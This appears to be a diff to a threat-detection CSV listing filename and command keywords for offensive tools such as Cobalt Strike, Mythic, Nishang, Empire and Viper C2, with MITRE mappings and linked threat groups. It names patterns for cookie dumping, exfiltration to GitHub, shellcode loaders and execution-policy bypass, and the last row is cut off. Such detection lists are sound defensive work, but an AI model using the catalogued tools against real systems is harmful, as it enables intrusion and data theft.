+"*execute_Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*execute_shellcode *","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
+"*Execute-ACLight.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*Execute-ACLight2.bat*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*execute-assembly *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*execute-assembly *.exe *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*execute-assembly *asreproast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*execute-assembly *kerberoast*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*execute-assembly SharpBlock*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*execute-assembly*Seatbelt*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*execute-assembly*sharpcookiemonster*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*execute-assembly*sigflip*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*ExecuteAssembly.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*executeAssembly.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*execute-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*Execute-Command-MSSQL*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Execute-DNSTXT-Code*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*execute-dotnet-assembly*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*execute-pe.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*executepersistence*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*execute-Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - 
T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackCreateThreadpoolWait.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackCreateTimerQueue.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackEnumChildWindows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_CallbackEnumWindows.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_DirectConnectReverseHTTPS.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_DirectConnectReverseTCPRc4.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_FakePPID.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_LinuxBaseShellcodeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_LinuxSelfGuardLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_NtCreateSection.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Execution_UserExecution_Syscall_inject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
+"*Execution_UserExecution_VSSyscallProject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*exegol4thewin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolController.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*exegol-docker-build*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolExceptions.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Exegol-images-main*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolManager.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*ExegolProgress.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExegolPrompt.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ExeStager.csproj*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 